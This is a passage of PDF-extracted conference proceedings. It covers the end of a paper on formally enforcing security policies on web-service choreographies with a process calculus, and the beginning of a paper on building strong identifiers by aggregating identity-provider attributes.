quote received from the seller : x quote :=equote . P
•
if e then P else Q is a choice based on the
evaluation of the boolean expression e. For
example, the buyer accepts the quote if it is under
1000
if equote <1000 then s◃accept ( equote ). P
else s◃reject (e quote ) .0
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
•
P⊕Q is the non deterministic choice. When the
choice of the buyer is arbitrary, it would be written
as: s◃accept ( equote ). P⊕ s◃reject (e quote ) .0
P∣Q is the parallel composition of processes.
•
For example, a seller that offers his service to
buyers should have his service running in parallel
for new requesters
! ch seller (s) . P∣P '∣P ' '∣...
where P',P'',... are processes dealing with different
buyers.
•
(ν s) P expresses the fact that the session
channel s is local to P. It is used to restrict a
session channel to be used between only two
participants that communicate through it.
rec X.P is the recursion operator used to
•
express repetitive behaviors. For example, a
participant having the following behavior will
always request quotes until he receives an
acceptation rec X. s◃quoteRequest (e) . .
s▹accept.P ⊕s ▹ reject.X
• Finally, 0 is the inaction.
Processes are located within participants. Participants and
their composition are called Networks (written N,M,...),
whose grammar is given by:
N : := A[ P]σ ∣ N∣M ∣ (ν s) N ∣ ǫ .
For more details about the syntax of EPC, the reader can
refer to [3].
B. Semantics of the End-Point Calculus
In order to minimize the number of reduction rules, we
define ≡ as the least congruence generated from:
P∣0 ≡P
P∣Q ≡Q∣P
( P∣Q )∣R≡P∣(Q∣R)
P⊕ P≡ P
P ⊕Q ≡Q⊕ P
( P⊕Q )⊕ R≡P ⊕(Q⊕ R)
( ν s)0≡0
( ν s1 )(ν s2 ) P ≡( ν s 2)( ν s1 ) P
(( ν s) P)∣Q ≡( ν s)( P∣Q) ( s∉ fn(Q ))
A[P ]σ ≡ A[Q]σ ( P≡Q)
A[(ν s) P]σ≡(ν s)( A[P ]σ)
M∣ǫ≡M
M∣N ≡ N∣M
(M ∣N )∣L≡M ∣( N∣L)
( ν s)ǫ≡ǫ
( ν s 1)( ν s 2) M ≡( ν s 2)( ν s 1) M
(( ν s) M )∣N ≡(ν s)( M∣N ) ( s∉ fn( N ))
The operational semantics of EPC are given in Figure 1.
• Init shows how two participants initiate a session by
sharing new freshly generated session channels
These session channels are restricted to
s̃.
participants A and B using the binding operator
ν .
90
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
•
Comm explains how a communication is
established between two participants: when B
invokes the operator op j , which is offered by
A, and sends the expression e j , which will be
evaluated to value v at A, then A receives it and
assigns v to its local variable x j .
• Assign is a local operation. Assignment rule
evaluates an expression e and assigns the result of
this evaluation to variable x in A, then A behaves as
P.
• IfThenElse evaluates the boolean expression e and
following the result of this evaluation, it behaves
either as P 1 or P 2 .
• Par shows the behavior of two concurrent
processes.
• Sum shows the alternative choice behavior.
• Rec says that if the process P, within which we
replace each occurrence of X by
rec X.P ,
behaves as P' then rec X.P will behave as P'.
• Res restricts the use of session channels ̃s to
the process P in A.
Finally, the following rule says we take the reductions up to
the structural rule:
M ≡M ' M ' → N ' N ' ≡ N
Struct NW
M→N
C.
Example
We consider a simplified version of a travel reservation
system. The scenario consists of three participants: a traveler,
a travel agent and an airline reservation system. The traveler
is planning for taking a trip. Once the traveler selects a trip,
he submits his choice to the travel agent. The travel agent
checks for seats availability within the airline reservation
system and sends back either a trip cancel or a validation.
The traveler wants to reserve tickets for this trip by sending
payment details to the travel agent. The travel agent now
must verify one more time availability of seats. If the seats
are still available then the airline reservation system accepts
the payment details and sends back to the travel agent tickets
of the trip. The travel agent responds to the traveler either by
tickets of the trip or by canceling the reservation.
The behavior of the traveler is given in EPC by:
chTA ( ν s ). s ▹ ack. s ◃orderTrip (e 1) .
s ▹ cancel.0⊕s ▹ available(x 1) . s ◃ book (e 2 ).
s▹ cancelBook.0⊕s ▹ tickets( x 2).0
The traveler starts by opening a session with the travel agent
through the public service channel ch TA and initiates a
communication channel s through which the communication
between the traveler and the travel agent will occur. Then,
the traveler receives through s an acknowledgment message
s ▹ ack . After that, the traveler sends an order trip
s◃orderTrip( e1) with expression e1 which contains
details about the chosen trip. At this point, there are two
scenarios: the traveler either receives a cancel request
when there are no available seats, or an
s▹cancel
available message s▹available ( x1 ) containing details of
the trip. In this case, the traveler may book the flight
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
s ◃ book (e 2 ) . Finally, traveler receives tickets message
s▹tickets( x2 ) if the transaction has succeed, otherwise
he will receive a cancelBook message .
The behavior of the travel agent is given by:
! chTA (s) . s ◃ack.s ▹orderTrip ( x 1).
ch A (ν s' ). s ' ▹ack. s ' ◃ checkSeat (e1 ).
s ' ▹ noSeats. s◃ cancel.0 ⊕
s' ▹ seatsOK ( x 2) . s ◃available (e 2 ). s ▹book ( x 3) .
s ' ◃ reserve(e 3) .
s ' ▹ reserved ( x4 ). s◃tickets(e 4) .0⊕
s ' ▹ notReserved ( x 5). s◃cancelBook.0
The travel agent offers his service through ch TA by
providing a communication channel s. Once his service is
invoked, he sends an acknowledgment message, receives an
order trip, then contacts the airline service through its public
service channel ch A . The communication between the
airline service and the travel agent occurs through the session
channel s' . The travel agent looks for available seats
s' ◃ checkSeat ( e1 ) . If there are no available seats then he
receives noSeats message s' ▹noSeats and he sends a
cancel message s◃ cancel to the traveler. Otherwise he
receives a seatsOK message s' ▹ seatsOK ( x 2 ) and sends
an available message s◃ available(e 2) to the traveler.
After that, the travel agent receives a book message from the
traveler s ▹ book ( x 3) and proceeds to flight reservation
s ' ◃ reserve (e 3) . Depending on seats availability, he
receives either a confirmation message s' ▹reserved ( x 4)
or a notReserved message s' ▹ notReserved ( x 5) . In the
first case, he sends tickets s◃tickets(e 4) to the traveler
elsewhere he sends a book cancellation s◃cancelBook.
The behavior of the airline is given by:
! ch A (s ' ). s '◃ ack.s ' ▹ checkSeat ( x1 ).
if available( x1) then s ' ◃ seatsOk (e1 ).
s' ▹ reserve ( x2 ). if available ( x 2) then
s ' ◃ reserved (e 2) .0 else
s ' ◃notReserved (e 3) .0
else s' ◃noSeats.0
The airline service offers his service through the service
channel ch A . Once his service is invoked, he sends an
acknowledgment message. Then, he receives a checkSeat
request. Subject to availability, he responds with a seatsOK
or noSeats message. In the first case, he may receive a seat's
booking request s' ▹ reserve ( x 2) . At this stage, the airline
service checks another time seats availability before
finalizing the process by either sending a reserved
s' ◃ reserved (e2 ) or s' ◃ notReserved ( e3 )
as notReserved message.
III. SECURITY POLICY SPECIFICATION LANGUAGE
In this Section, we introduce the Security Policy Calculus
(SPC), a formalism used for describing security policies.
SPC is considered as a subset of EPC in the sense that it uses
only some operators of EPC. Indeed the operators that are
91
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
used in SPC are communication actions, recursion,
indeterministic choice and no action. Security policies will
be represented by processes that will monitor the execution
of an another process from EPC.
security properties that we verify in this paper are safety
properties and liveness properties without infinite behavior.
The reason behind this choice is that some liveness
properties can only be verified statically.
B. Shortcuts
Figure 1
A. Syntax
The syntax of SPC is given by:
φ ::= s◃⊕op i . φi ∣ s▹Σop i . φi ∣ φ 1⊕φ 2 ∣ rec X .φ ∣ 0
• The construct
s◃⊕op i . φi expresses the fact
that invoking one of operators op i through
session channel s is permitted by φ .
• Next we have s▹ Σop i . φi , which allows
reception of operators op i through s.
• The indeterministic branching is given by
φ1 ⊕φ 2 .
• For representing repeated behaviors, we use the
recursion operator and
• finally, 0 denotes the lack of actions.
For describing security properties, we need usually to
express the prohibition of executing some actions. In our
case, when we want for example to interdict sending
operation op 1 through s we would write this security
property: φ=s ◃ ⊕ op i .0 , which says that we can invoke
i ≠1
anyone of the operators op i unless op 1 . If we want
this behavior to be repeatedly verified we would write
φ=rec X. s◃ ⊕ opi . X . The semantics are the same as
i ≠1
for EPC since SPC is a subset of EPC.
Usually, we use temporal logics for describing security
properties but when using the security policy calculus we
also reach our goal of expressing any security property that
we want to enforce on the behavior of a WS. Since this
approach introduces a dynamic verification of WS, so the
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
For shortness, we will denote by ϕ s and ϕ s the
portions of a security property that respectively allows all
input (output) interactions through s. So ϕ s= s▹ Σ opi ( xi )
and ϕ s = s◃⊕ opi (e i ) .
C. Example
In the airline reservation system, it is assumed the travel
agent wants to be sure that his service does not send tickets
before the reception of payment details. The travel agent
receives payment details within the book message
s▹book( x3 ) and sends tickets within the tickets message
s◃tickets(e 4) . So we want to ensure that
s◃tickets(e 4) does not occur before
s▹ book( x3 ) .
The security property will be written as follows:
rec X. s◃
⊕
opi≠tickets
op i (e i ). X ⊕ s ▹
Σ op i ( x i ). X
opi ≠book
⊕ϕ s ' . X ⊕ϕ s ' . X ⊕ s▹book ( x).
(rec Y.ϕ s . Y ⊕ϕ s .Y ⊕ ϕs ' . Y ⊕ϕ s ' .Y )
The security property is written using a recursion. The idea is
to put after each action different from book and tickets the
recursion variable X. Thus, the property will remain invariant
when executing these actions. It will evolve only by
executing the book message. In this recursion, one of these 4
blocks will be executed:
•
s◃ ⊕ op i (e i ). X : it prohibits invoking
opi≠tickets
tickets operator through s, which is shared between
the traveler and the travel agent. Any message
different from tickets can be sent.
92
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
•
•
•
s▹ Σ
opi≠book
opi ( xi ) . X
: this block prohibits the
reception of book operator invocation through the
session channel s. Any message different from
book can be received.
ϕ s ' . X and ϕ s ' . X : all actions are permitted
between the travel agent and the airline reservation
service. The channel s' is a session channel shared
between the travel agent and the airline reservation
system.
s▹book ( x). rec Y. ϕ s . Y ⊕ϕ s .Y ⊕ϕ s ' .Y ⊕ ϕs ' . Y
this block intercepts the invocation of the book
operator within the travel agent and then we take
off the control on tickets operator by allowing all
actions between the traveler and the traveler agent
through s and the travel agent and the airline
reservation system through s' to be executed.
IV.
ENFORCEMENT APPROACH
In this Section, we will introduce our enforcement
approach using rewriting techniques. This approach consists
in adding some special actions to processes representing the
behavior of a WS and a security property in order to make
them synchronize on each interaction that will occur.
A. Communication Actions of EPC
Communication actions are used in this context to
designate interactions of EPC. Interactions of EPC are given
by these two constructs: s◃op(e) and s▹Σop i ( x i ).
They are distinguished by three criteria:
• session channel (s),
• operator name ( op i ),
• and direction ( s◃ or s▹ ).
Indeed, each interaction in EPC occurs through a session
channel that have been freshly generated and shared between
two participants. Within each interaction an operator is either
invoked or offered depending on the direction of the
interaction. For instance, s◃op1 ( e) is an invocation of
the operator
op 1
through the session channel s,
is a reception of an invocation of the
s' ▹op 2 ( x)
operator
on the session
channel
s'.
op 2
The goal of this approach is to monitor the execution of
interactions inside a choreography. This goal will be
achieved by controlling the execution of communication
actions of EPC.
B. Synchronization Actions
Synchronization actions are special actions that we add to
the process and to the security property enforced on this
process in order to ensure the interception of each
communication action by the monitor. The idea of using
synchronization actions to intercept actions is inspired from
[6]. So, given a communication action
s◃op( e)
(respectively
the
corresponding
s▹Σop i ( x i ) ),
synchronization action is
(respectively
s◃ op( e)
s▹Σop i ( x i ) ).
C. Rewriting Processes
In order to achieve our goal that consists on enforcing a
security property on the behavior of a participant A in a
choreography, we need to rewrite its process by adding
synchronization actions. Informally, we will add before
each
communication
action
its
corresponding
synchronization action. Formal rules for rewriting a process
P of EPC are:
〈 ! ch ( ̃s ) . P 〉 := ! ch( ̃s ). 〈 P 〉
〈 ch (ν s̃ ) . P 〉 := ch ( ν s̃ ). 〈 P 〉
〈 x :=e.P 〉 := x :=e.〈 P 〉
〈 P ⊕Q 〉 := 〈 P 〉⊕〈Q 〉
〈 P∣Q 〉 := 〈 P 〉∣〈 Q 〉
〈if e then P else Q 〉 := if e then 〈 P 〉 else 〈Q 〉
〈 rec X.P 〉 := rec X. 〈 P 〉
〈 s◃ op( e). P〉 := s◃ op (e). s◃op( e) . 〈 P 〉
〈 s ▹op( x). P 〉 := s▹ op( x) . s▹op ( x). 〈 P 〉
D. Rewriting Security Properties
Rewriting the security property consists on replacing
each communication action by its synchronization action.
Formal rules for rewriting security properties are:
〈 s◃⊕ opi . φi 〉 := s◃⊕op i . 〈φi 〉
〈 s▹ Σ opi . φi 〉 := s▹Σ opi . 〈φ i 〉
〈 φ1 ⊕φ2 〉 := 〈φ1 〉⊕ 〈φ 2 〉
〈 rec X . φ〉 := rec X . 〈φ 〉
E. Restriction Operator
In order to make the rewritten security property φ and
the rewritten process P synchronize, we will define an
operator of EPC that we call the restriction operator and we
denote by P ∖φ . The role of this operator is to let the
process evolve normally when no communication actions is
willing to occur. Before a communication action will occur
P ∖φ will intercept its synchronization action and verify
if the security property can evolve by executing this
synchronization action. If it is the case then P and φ
execute this synchronization action. Else P will block and
will not execute any other actions. An another role of this
enforcement operator is that it hides synchronizations of P
and φ for the rest of the choreography. Thus, executions
of synchronization actions in EPC will be marked by τ
as silent actions. Thus our restriction operator does not affect
the evolution of P when no synchronization action is willing
to occur. P ∖φ must ensure the synchronization of P and
φ on only synchronization actions.
F. Normal Form of a Process
Every process representing the local behavior of a
participant in a WS can be written as an internal sum of
processes, which we call the normal form of a process:
P= ⊕ a i . P i where ai range over atomic actions, I is
i ∈I
a finite subset of natural numbers, and
processes.
Pi
range over
Atomic actions of EPC are: session initiation request
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
93
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
( ch (ν ̃s ) ), session initiation offer ( ! ch ( ̃s ) ),
communication input ( s▹op( x) ), communication output
( s◃op( e) ), assignment ( x :=e ) and synchronization
actions ( s▹op( x) , s◃ op( e) ).
In this Section, we prove the correctness of our theory by
defining first a partial order over processes and the
satisfaction notion.
G. Simulation
We say that a process P can execute an action a and becomes
a
P' and we write P → P ' if, when we write P in its normal
such that
form ( P= ⊕ a i . P i ), there exists
j∈ I
A. Definition (Subprocess)
Let P, Q be two processes. We say that P is a subprocess of
Q and we write P⊆Q if the following condition hold :
a
a
P → P ' ⇒ Q → Q ' and P '⊆Q ' .
i ∈I
and
where ≡ is the structural
P j≡ P '
a j =a
equality defined in the semantics of EPC.
H. Semantics
Reduction rules for making
P ∖φ progress when
executing synchronization actions are given by:
s ◃op (e)
s◃op (e)
s ▹op (x )
s ▹op ( x)
P → P' φ → φ' P → P '
φ → φ'
τ
τ
A[ P ∖ φ]σ → A[ P ' ∖ φ' ]σ A[P ∖ φ]σ → A[ P ' ∖ φ' ]σ
V. PROOF OF THE APPROACH
B. Definition (Safe Action, Safe Trace)
A trace ξ of EPC is a sequence of atomic actions
executed by a process. An atomic action is said to be safe if
it is not a synchronization action. A trace is said to be safe if
it contains only safe actions.
C. Definition (Progression of P)
We say that a process P can progress by executing some
safe actions and a synchronization action a and become Q,
a
These rules say that each synchronization action of P will be
intercepted by φ and it cannot be executed if φ
prohibits it. If the synchronization action can be executed by
φ then P becomes silently P' and φ becomes φ ' .
I. Example
Consider the airline reservation system case study. We will
enforce the security property φ defined in the precedent
example on the behavior P of the travel agent defined in the
first example of this paper. The rewritten process and
security property are:
P=! ch TA ( s). s◃ ack . s◃ ack. s▹ orderTrip ( x1 ).
s ▹ orderTrip( x 1) . ch A ( ν s ') . s ' ▹ ack . s ' ▹ ack.
s ' ◃checkSeat (e 1) . s ' ◃ checkSeat ( e1 ).
(s '▹ noSeat . s ' ▹ noSeat. s ◃ cancel . s◃ cancel.0 )
⊕ s ' ▹ seatOk ( x 2) . s ' ▹ seatOk ( x 2) . s ◃ available( e2 ).
s ◃available (e 2 ). s ▹ book ( x 3) . s ▹ book ( x 3) .
s ' ◃ reserve (e 3) . s ' ◃ reserve (e 3). s ' ▹ reserved (x 4).
s ' ▹ reserved ( x 4) . s◃ ticket (e 4) . s ◃ticket (e 4) .0
⊕s ' ▹ notReserved ( x 5) . s ' ▹ notReserved ( x 5) .
s ◃ cancelBook . s ◃ cancelBook.0
φ=rec X. s◃ ⊕
op i ≠ticket
opi (e i ). X ⊕s▹
Σ
op i ≠book
op i ( xi ). X ⊕
〈ϕs ' 〉. X ⊕〈 ϕ s ' 〉 . X ⊕ s▹ book ( x ). rec Y.〈 ϕs 〉 . Y ⊕〈ϕ s 〉 .Y ⊕
〈 ϕs ' 〉 .Y ⊕〈 ϕs' 〉 .Y
where 〈ϕ s 〉= s▹ Σ op ( x) , 〈ϕ s 〉=s ◃⊕ opi (e i ) and
i
D. Definition (Satisfaction Notion)
We say that a process P satisfies a security property φ
and we write P≈φ if for all synchronization action a
a
ISBN: 978-1-61208-376-6
a
such that P ⇥ P ' we have φ → φ' and
P '≈φ' .
E. Theorem
Let P be a process and φ a security property. The
following properties hold :
•
P ∖ φ⊆ P ,
•
P ∖ φ≈φ ,
•
∀ P '≈ φ , P '⊆ P ⇒ P ' ⊆P ∖ φ .
F. Proof
•
•
The proof is obtained directly from the reduction
rules of our enforcement operator and from the
definition of ⊆ . Indeed P ∖ φ is defined so
that it cannot execute any actions that P does not
execute it.
Let a be a synchronization action such that
a
i
similarly for 〈ϕ s ' 〉 and 〈ϕ s ' 〉 .
TravelAgent [ P ∖ φ] will use first Init reduction rule to
open a parallel session then for each communication action,
it will synchronize with φ using the reduction rules of
and then communicates using communication
P ∖φ
reduction rules. We can see easily that this process P
satisfies the security property φ .
Copyright (c) IARIA, 2014.
and we write P ⇥ Q if it exists a safe trace ξ and a
ξ
a
process P' such that P → P ' and P ' → Q .
•
P ∖φ ⇥ P ' ∖φ ' . It exists a safe trace ξ such
ξ
a
that P ∖φ → P ' ' ∖ φ and P ' ' ∖φ → P ' ∖ φ' .
But executions of synchronization actions by
P ' ' ∖φ are given by In-Sync and Out-Sync
a
rules. Then we have necessarily φ → φ ' .
Let P' be a process satisfying a security property
a
φ such that P '⊆ P . Suppose P ' → P ' ' .
a
P '⊆ P
then
As
P → Q . If a is a
synchronization action then from the hypothesis
94
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
a
P '≈φ we conclude that φ → φ ' and then
a
P ∖ φ→ Q ∖ φ' . If a is not a synchronization
a
action then P ∖φ → Q ∖φ .
VI. RELATED WORK
Several works have studied the correctness and
conformance of composition of WS to security
requirements.
A. Baouab et al. [7] show a run-time event-based approach
to deal with the problem of monitoring conformance of
interaction sequences. When a violation is detected, the
program shows errors in dashboards. So the program does
not stop before the violation occurred. J. Simmonds et al.
[8] formalize sequence diagrams to express WS
conversations and security requirements and then translate
them to nondeterministic finite automata and generate
monitors from NFA. Their WS conversation is extracted
from the definition of simple services and so they did not
consider the great number of WS conversations that will be
provided with the composition of WS. D. Dranidis et al. [9]
introduced an approach to verify the conformance of a WS
implementation against a behavioral specification, through
the application of testing. The Stream X-machines are used
as an intuitive modeling formalism for constructing the
behavioral specification of a stateful WS and a method for
deriving test cases from that specification in an automated
way. The test generation method produces complete sets of
test cases that, under certain assumptions,
are guaranteed to reveal all non-conformance faults in a
service implementation under test. However, this approach
only returns nonconformance faults and does not react
dynamically against these errors. Furhtermore, L. Ardissono
et al. [10] propose a monitoring framework of a
choreographed service which supports the early detection of
faults and decide whether it is still possible to continue the
service.
R. Gay et al. [11] have proposed service automata as a
framework for enforcing security policies in distributed
systems. They encapsulate the program in a service
automaton composed of the monitored program, an
interceptor, an enforcer, a coordinator and a local policy.
The interceptor intercepts critical actions and passes them to
the coordinator that determines whether the action complies
the security policy or not and decides upon possible
countermeasures then the enforcer implements these
decisions. However the authors do not precise how to detect
critical actions. W. She et al. [13] have developped an
innovative security-aware service composition protocol with
composition-time information flow control, which can
reduce the execution-time failure rate of the composed
composite services due to information flow control
violations. This approach only guarantees that there are no
access control violations at execution time but do not
guarantee that there are not access control violations at
runtime. Jose A. Martìn et al. [14] developed a framework
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
based on the partial model checking technique for statically
verifying whether a composition of WS satisfies
cryptographic properties such as secrecy and authenticity.
VII. CONCLUSION AND FUTURE WORK
The goal of this research is to introduce an automated
formal approach for enforcing dynamically security policies
on a choreography of WS using the rewriting technique. We
used a formal language to express conversations of different
participants and to express also security requirements. Then,
we have shown how to restrict the progression of
participant's behavior in order to satisfy security policies.
Future work is concentrated on the optimization of this
approach by reducing the number of synchronization actions
that have been added to processes.
REFERENCES
[1]
[2]
[3]
[4]
[5]
[6]
[7]
[8]
[9]
[10]
[11]
[12]
[13]
[14]
I. Corporation, “Business process execution language for web
services bpel-4ws,” http://www.ibm.com/developerworks/library/wsbpel/, 2002.
N. Kavantzas, D. Burdett, G. Ritzinger, T. Fletcher, and Y. Lafon,
“Web services choreography description language version 1.0,” W3C
Working Draft, December 2004.
M. Carbone, K. Honda, and N. Yoshida, “Theoretical aspects of
communication-centred programming,” Electr. Notes Theor. Comput.
Sci., vol. 209, 2008., pp. 125–133.
N. Busi, R. Gorrieri, C. Guidi, R. Lucchi, and G. Zavattaro, “Towards
a formal framework for choreography,” in WETICE, 2005, pp. 107–
112.
G. D´ıaz, J. J. Pardo, M.-E. Cambronero, V. Valero, and F. Cuartero,
“Automatic translation of ws-cdl choreographies to timed automata,”
in EPEW/WS-FM, pp. 230–242, 2005.
M. Langar, M. Mejri, and K. Adi, “Formal enforcement of security
policies on concurrent systems,” J. Symb. Comput., vol. 46, no. 9, pp.
997–1016, 2011.
A. Baouab, O. Perrin, and C. Godart, “An optimized derivation of
event queries to monitor choreography violations,” in ICSOC, 2012,
pp. 222– 236.
J. Simmonds et al., “Runtime monitoring of web service
conversations,” IEEE T. Services Computing, vol. 2, no. 3, 2009, pp.
223–244.
D. Dranidis, E. Ramollari, and D. Kourtesis, “Run-time verification
of behavioural conformance for conversational web services,” in
ECOWS, 2009, pp. 139–147.
L. Ardissono, R. Furnari, A. Goy, G. Petrone, and M. Segnan,
“Monitoring choreographed services,” in Innovations and Advanced
Techniques in Computer and Information Sciences and Engineering,
2007, pp. 283– 288.
R. Gay, H. Mantel, and B. Sprick, “Service automata,” in Formal
Aspects in Security and Trust, 2011, pp. 148–163.
H. Yang, X. Zhao, Z. Qiu, G. Pu, and S. Wang, “A formal model for
web service choreography description language (WS-CDL),” in 2006
IEEE International Conference on Web Services (ICWS 2006),
September 2006, 18-22. Chicago, Illinois, USA, 2006, pp. 893–894.
W. She, I. Yen, B. M. Thuraisingham, and E. Bertino, “Securityaware service composition with fine-grained information flow
control,” IEEE T. Services Computing, vol. 6, no. 3, pp. 330–343,
2013.
J. A. Mart´ın, F. Martinelli, I. Matteucci, E. Pimentel, and M.
Turuani, “On the synthesis of secure services composition,” in
Engineering Secure Future Internet Services and Systems - Current
Research, 2014, pp. 140– 159.
95
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Obtaining Strong Identifiers Through Attribute Aggregation
Walter Priesnitz Filho, Carlos Ribeiro
Inesc-id, Instituto Superior Técnico, Universidade de Lisboa
Lisboa, Portugal
Email: {walter.filho, carlos.ribeiro}@tecnico.ulisboa.pt
Abstract—The development of services and the demand for
resource sharing among users from different organizations with
some level of affinity motivate the creation of identity management systems. An identifier can be a single name or a number
that uniquely identifies a person, although this is often just a
representation of a facet of the person. In a federation, services
may require user facets comprised of attributes managed by
different identity systems which may then be perceived as two
facets of two distinct users and not as belonging to the same user.
This problem can be handled by adding a new entity type to the
traditional architecture thereby creating links between users from
different Identity Providers (IdPs), or by using ontologies in order
to establish relations between user attributes from several IdPs.
In this paper, we propose a solution consisting of obtaining strong
identifiers by combining user attributes within IdPs using direct
attribute matching and ontologies. Our application context is the
Stork 2.0 Project, an eGovernment Large Scale Project (LSP).
Keywords—Privacy; Identity Management Systems; Attribute
Aggregation.
I. I NTRODUCTION
The development of services and the demand for resource
sharing among users from different organizations with some
level of affinity motivate the creation of identity federations.
An identity federation features a set of common attributes,
information exchange policies and sharing services, allowing
for cooperation and transactions between the Federation’s
members [1].
Although there is no definitive architecture, an identity
federation is frequently described as being comprised by: an
Identity Provider (IdP), a Relying Party (RP), and a Service
Provider (SP) [2]. An IdP is responsible for establishing,
maintaining, and securing the digital identity associated with
a subject, it may also verify the identity and sign up of
that subject. A RP makes transaction decisions based upon
receipt, validation, and acceptance of a subject’s authenticated
credentials and attributes within the Identity System. Relying
parties select and trust the identity and attribute providers
of their choice, based on risk and functional requirements.
Finally, the SP controls the access to the services and resources
relying on authorities [3].
An identity is composed by a set of attributes, of which at
least one identifies its owner. Although an identifier is often
seen as a single name or number that uniquely identifies a
person, this is often just a representation of a person’s facet,
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
characterizing the person as authorized to access a service
(e.g., employer of, member of). Within a federation, this
kind of identities are not relevant for authorization, given
that different services require different user facets. Therefore,
within a federation each person is characterized by a number
of attributes that may be combined to create several facets,
which are released whenever necessary to SPs. IdPs manage
these attributes, releasing them to SPs according to a security
policy, often when required by the authenticated user.
Inside a federation there might be services requiring user
facets comprised by attributes managed by different identity
systems, which is a problem because often those facets are
perceived as belonging to different users rather than the same
user. Facets composed by attributes managed by different IdPs
may be required for functionality reasons (e.g., checking the
curriculum vitae of a person with degrees in several different
universities) or it might be required just to increase the strength
of the identity.
According to [4], a strong identifier is capable of uniquely
identifying a subject in a population by minimizing multiplicity (i.e., the size of the subset of subjects that match that
identifier) within a group of subjects, thereby improving the
quality of the identification attributes. When considering the
overall strength of the identifier, in addition to the multiplicity
of the identifier, the Assurance Level of an attribute must also
be considered. Assurance Levels (ALs) [5] are the levels of
trust associated with a credential and depend of several factors, namely associated technology, processes and policy and
practice statements controlling the operational environment.
In some cases, in order to build a strong identifier to satisfy a
service’s requirement it may be necessary to use a larger set of
attributes than the ones present in any IdP. However, incorrect
merging of attributes could result in credentials of different
persons being attributed to a single user if, for instance, they
share the same name and birthday or have other matching
attributes.
In this paper, we propose a solution to build strong identifiers by combining the users’ attributes within IdPs using
direct attribute matching and ontologies in order to find
correspondences in users’ attributes distributed on IdPs.
This paper is structured as follows: Section II describes
some recent proposals on attribute merging. Section III describes open issues on building strong identifiers, while Sec-
96
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
tion IV presents particular considerations and possibilities
for solving the problem. Finally, Section V considers future
research and remaining issues, and Section VI concludes the
paper.
II. R ELATED W ORK
The integration of diverse sources of attributes has been
the subject of research by several authors [4], [6]–[9]. Several
approaches have been proposed to overcome the challenges
discussed above. Some of the proposed solutions include:
Aggregation Entities, Aggregation with Focus on Privacy, and
Ontologies.
A. Aggregation Entities
Aggregation entities are specifically designed and run to
aggregate attributes from several sources.
The Linking Service (LS) is a special kind of aggregation
entity proposed in [6] and [7]. The LS acts as an intermediary
between the IdP and SP creating links, through user interaction, so that attributes that are present in more than one IdP
can be linked and used to identify the user of a particular
service. The solution proposed by the authors allows the users
to safely establish links between their accounts on several IdPs.
The LS connects the different identities and also manages the
authentication of different IdPs, so that the user is not required
to authenticate separately on each IdP.
The work proposed by [8] enriches the Linking Service
concept with some privacy properties identified in Federated
Identity Management Systems (FIMS). Firstly, an IdP should
not be able to profile the users’ actions, therefore, direct links
between IdPs and SPs are not allowed and direct interaction between IdPs and SPs is prevented by specific services
pseudonyms. Secondly, the disclosure of personal information
is controlled by multiple parties, preventing that any single
entity from compromising user privacy. SPs cannot obtain the
users’ personal information from IdPs without prior consent
of the users.
B. Aggregation with Focus on Privacy
Another proposal focused on privacy [11] uses an extension
to the Oblivious Commitment Based Envelope (OCBE) protocol. The proposed extension is a version of OCBE protocol
for equality predicates (Agg-EQ-OCBE) that analyses multiple
functions simultaneously without a significant increase in
computational cost. The proposed extension also uses less
bandwidth compared to the EQ-OCBE.
C. Ontologies
The use of ontologies allows a higher degree of automation
in the process of attribute merging/aggregation. Through its
application, it is possible to deal with heterogeneity, which is
one of the problems related to aggregating data from different
sources.
In [12], authors define four classes of heterogeneity: heterogeneity of the system, that occurs due to technical differences
between platforms; syntactic heterogeneity, which is related
to representation and formats of data; structural heterogeneity,
which results from differences in schemas; and semantic heterogeneity, which refers to differences in meaning generated
by different vocabularies and terminologies used.
Ontologies are used in order to share and reuse knowledge
[13]. In this context, an ontology is a specification used to
create ontological commitments, which are agreements to use
a certain vocabulary so that it is consistent with the theory
specified in that ontology.
In [14], the authors analysed the requirements of the Pan European e-Services and other features related with integration.
The analysis applies basic concepts from a generic model of
public service of Governance Enterprise Architecture (GEA)
and the Web Service Modelling Ontology (WSMO) to the
semantic description of e-Services.
In spite of findings related to defining ways of achieving
reliable attribute aggregation processes, to solutions providing
privacy, and on ontology mapping, a solution that integrates
all these properties has yet to be found.
III. O PEN I SSUES
When working with various sources of integrated data one
should take into account the mechanisms in use to which
control attributes and data sources should have its access
released or denied. This briefly very describes a pertinent issue
namely the privacy of the users involved in these processes of
data source integration and attribute aggregation.
Approaches used for attribute aggregation are beneficial
with regards to obtaining data from various sources, as they
are intended to be. However, there are issues that could be
improved in these approaches such as the availability of users
data aggregators or the use of a single aggregation point for
instance.
In [10], authors present lookup tables, dictionaries, and
ontologies to map vocabularies and customers. They use
aggregated zero knowledge proofs of knowledge (AgZKPK) to
allow users to prove ownership of multiple attributes of their
identity, without disclosing anything else. The proposal features an authentication service architecture (User-SP-IdP) with
Registrars (Rs) entities, which store and manage information
regarding reliability/strength of the identifying attributes used
in their approach.
According to [10] attributes of strong/reliable identification are those capable of uniquely identifying a subject in
a population (low multiplicity and high quality), and weak
identification attributes are those that may correspond to
several subjects (high multiplicity and low quality). Although,
two strong identification attributes may separately be able to
uniquely identify a subject, their intersection may form a weak
identification attribute set, which is not enough to uniquely
identify a subject, and therefore is not enough for merging
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
97
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
two identities. Procedures using different IdPs, weak links,
etc. could decrease the confidence level of merged identities.
The solutions presented in [10] relate to the treatment
of name heterogeneity, mainly with regards to variations
in wording, and restrict the language to English. In more
heterogeneous environments using the Lookup Tables, as the
authors propose, would not be feasible.
The use of ontologies is an interesting resource that we can
use to aggregate users’ attributes, but when considering the
